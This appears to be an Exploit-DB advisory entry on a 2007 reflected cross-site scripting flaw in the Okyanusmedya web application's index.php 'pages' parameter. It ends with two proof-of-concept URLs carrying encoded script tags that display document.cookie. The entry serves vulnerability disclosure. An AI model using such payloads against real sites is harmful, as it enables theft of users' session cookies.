Okyanusmedya - 'index.php' Cross-Site Scripting

EDB-ID:

30140

CVE:

N/A


Author:

vagrant

Type:

webapps


Platform:

PHP

Date:

2007-06-04


source: https://www.securityfocus.com/bid/24285/info

Okyanusmedya is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php?pages=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E http://www.example.com/index.php?pages=menu=3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E